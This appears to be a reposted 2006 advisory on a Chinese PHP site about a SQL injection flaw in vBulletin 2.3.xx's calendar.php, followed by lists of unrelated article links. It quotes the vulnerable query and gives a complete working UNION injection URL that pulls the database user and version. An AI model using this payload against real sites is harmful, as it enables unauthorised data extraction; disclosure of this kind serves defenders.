编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

Zend的AutoLoad机制介绍

Sep 27 PHP

利用PHP扩展vld查看PHP opcode操作步骤

Mar 04 PHP

php 如何获取数组第一个值

Aug 06 PHP

php json与xml序列化/反序列化

Oct 28 PHP

php+mysql数据库实现无限分类的方法

Dec 12 PHP

php访问数组最后一个元素的函数end()用法

Mar 18 PHP

微信开发生成带参数的二维码的实例

Nov 23 PHP

thinkPHP线上自动加载异常与修复方法实例分析

Dec 01 PHP

php使用ftp实现文件上传与下载功能

Jul 21 PHP

thinkPHP5分页功能实现方法分析

Oct 25 PHP

php无限极分类实现方法分析

Jul 04 PHP

Thinkphp5+Redis实现商品秒杀代码实例讲解

Dec 29 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

php操作sqlserver关于时间日期读取的小小见解

2009/11/29 PHP

浅析PHP中的UNICODE 编码与解码

2013/06/29 PHP

php mail to 配置详解

2014/01/16 PHP

codeigniter数据库操作函数汇总

2014/06/12 PHP

PHP实现获取域名的方法小结

2014/11/05 PHP

PHP 错误处理机制

2015/07/06 PHP

兼容IE/Firefox/Opera/Safari的检测页面装载完毕的脚本Ext.onReady的实现

2009/07/14 Javascript

extjs实现选择多表自定义查询功能前台部分(ext源码)

2011/12/20 Javascript

Jquery在指定DIV加载HTML示例代码

2014/02/17 Javascript

javascript瀑布流式图片懒加载实例解析与优化

2016/02/23 Javascript

详解JavaScript权威指南之对象

2016/09/27 Javascript

Angular.js中ng-if、ng-show和ng-hide的区别介绍

2017/01/20 Javascript

微信小程序天气预报开发实例代码源码

2017/01/20 Javascript

zTree树形插件异步加载方法详解

2017/06/14 Javascript

Angular中ng-options下拉数据默认值的设定方法

2017/06/21 Javascript

微信小程序获取javascript 里的数据

2017/08/17 Javascript

Vue项目添加动态浏览器头部title的方法

2018/07/11 Javascript

element-ui 中使用upload多文件上传只请求一次接口

2019/07/19 Javascript

vue 中的动态传参和query传参操作

2020/11/09 Javascript

Vue项目打包部署到apache服务器的方法步骤

2021/02/01 Vue.js

Python中的异常处理学习笔记

2015/01/28 Python

Python处理CSV与List的转换方法

2018/04/19 Python

python pprint模块中print()和pprint()两者的区别

2020/02/10 Python

解决Django提交表单报错:CSRF token missing or incorrect的问题

2020/03/13 Python

如何在python中实现线性回归

2020/08/10 Python

Django-celery-beat动态添加周期性任务实现过程解析

2020/11/26 Python

享誉全球的多元化时尚精品购物平台：Farfetch发发奇（支持中文）

2017/08/08 全球购物

顶丰TOPPIK台湾官网：增发纤维假发，告别秃发困扰

2018/06/13 全球购物

建筑工程自我鉴定

2013/10/18 职场文书

妇科医生自荐信

2013/11/05 职场文书

保密承诺书

2014/03/27 职场文书

2014年机关作风建设工作总结

2014/10/23 职场文书

2014年车间工作总结

2014/11/21 职场文书

北京青年观后感

2015/06/15 职场文书

培训计划通知

2015/07/15 职场文书

Spring Data JPA的Audit功能审计数据库的变更

2021/06/26 Java/Android